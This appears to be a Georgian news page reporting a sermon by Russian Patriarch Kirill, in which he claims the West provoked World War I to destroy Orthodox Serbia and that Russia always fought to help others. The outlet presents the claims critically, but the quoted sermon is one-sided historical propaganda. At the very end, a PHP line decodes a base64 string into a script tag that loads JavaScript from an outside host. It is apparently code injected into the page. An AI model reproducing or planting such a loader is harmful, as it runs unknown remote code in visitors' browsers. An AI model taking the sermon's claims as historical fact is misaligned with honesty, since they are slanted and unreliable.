celsiusi
ავერსი საქკაბელი
პატრიარქი კირილის განცხადებით, რუსეთი ყოველთვის თავს სწირავდა სხვების დასახმარებლად. დასავლეთს კი არ სურდა რუსეთის მოყვარული ეს მამაცი მართლმადიდებელი ხალხი თავის ხალხებში ყოფილიყო და პირველი მსოფლიო ომის პროვოცირება მოახდინა. ამის ამის შესახებ მან ქადაგებისას ისაუბრა. 
 
ოკუპანტი ქვეყნის პატრიარქმა, რუსეთი ერთმორწმუნე პატარა ქვეყნების დამცველად დაასახელა და მაგალითად სერბეთი გაიხსენა. 
 
"და პირველი მსოფლიო ომი? დასავლური ძალების მთავარი მიზანი და სამიზნე სერბები გახდნენ. და ეს ცნობილი პროვოკაცია სარაევოში - ყველაფერი იმისთვის იყო მიმართული, რომ სერბეთმა, სულით რუსეთთან ახლოს მყოფმა, მაგრამ დასავლეთის ქვეყნებით გარემოცულმა მართლმადიდებლურმა ქვეყანამ არსებობა შეწყვიტოს. დასავლეთს არ სურდა რუსეთის მოყვარული ეს მამაცი მართლმადიდებელი ხალხი თავის ხალხებში ყოფილიყო და პირველი მსოფლიო ომის პროვოცირება მოახდინა. და რუსეთი ამ ომში შევიდა არა იმისთვის, რომ მოეპოვებინა მიწა თავისთვის, არა იმისთვის, რომ გამდიდრებულიყო, არა იმისთვის, რომ მოეპოვებინა ძალაუფლება სხვებზე, არამედ იმისთვის, რომ გადაერჩინა მოძმე სერბი ხალხი.
 
რუსეთი თავს სწირავდა სხვების დასახმარებლად. ამიტომ ჩვენ ვეძახით ჩვენს ჯარს ქრისტესმოყვარეს - რადგან რა ძალას შეუძლია, გარდა შინაგანი სულიერი სიძლიერისა, ახსნას ჩვენი ჯარისკაცების დიდი ღვაწლი იმ ორ ომში!...
 
და რა მოხდა დიდი სამამულო ომის დროს? საშინელი მტერი თავს დაესხა ქვეყანას, რომელსაც არ გაუვლია თავისი ისტორიის საუკეთესო პერიოდი - 20-30-იანი წლები. თითოეულმა ჩვენგანმა, ვინც ისტორიას სწავლობს, იცის, რამდენად რთული და საშინელიც კი იყო ეს წლები ხალხისთვის. მაგრამ შემდეგ ომი მოვიდა და ყველა შეურაცხყოფა დავიწყებას მიეცა, ყველა რეპრესირებული მზად იყო წასულიყო და დაეცვა სამშობლო. და რამდენი ადამიანი, რომელსაც მანამდე ხელისუფლება თვლიდა ხალხის მტრად, გახდა სამშობლოს მგზნებარე დამცველი! საიდან მოდის ეს ყველაფერი? - ჩვენი სულიერი ფესვებიდან, ჩვენი ეროვნული იდენტობიდან, ჩვენი ხალხის სულიერი ღირებულებებიდან. და უღმერთო დროშიც კი არ შეიძლებოდა ამ ფასეულობების განადგურება, რადგან ისინი გახდნენ ცხოვრების ნაწილი, ჩვენი ხალხის სულის ნაწილი.
 
და დღეს, ამ სამხედრო ტაძარში, ჩვენ პატივს მივაგებთ ყველას, ვინც ახლა იცავს ჩვენს სამშობლოს სხვადასხვა საზღვრებზე. ჩვენ გვჯერა, რომ ჩვენს ჯარს დღესაც სჭირდება სულიერი ძალა, თანადგომა და რაც მთავარია, მთელი ჩვენი ხალხის ლოცვა, არანაკლებ იმ დროისა, რაც მე გავიხსენე. ჯარს კი უნდა ახსოვდეს, რომ ჩვენ გვიყვარს, გვახსოვს და ვლოცულობთ მათთვის, ვინც დღეს იცავს ჩვენს სამშობლოს" - თქვა რუსეთის პატრიარქმა.
682
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");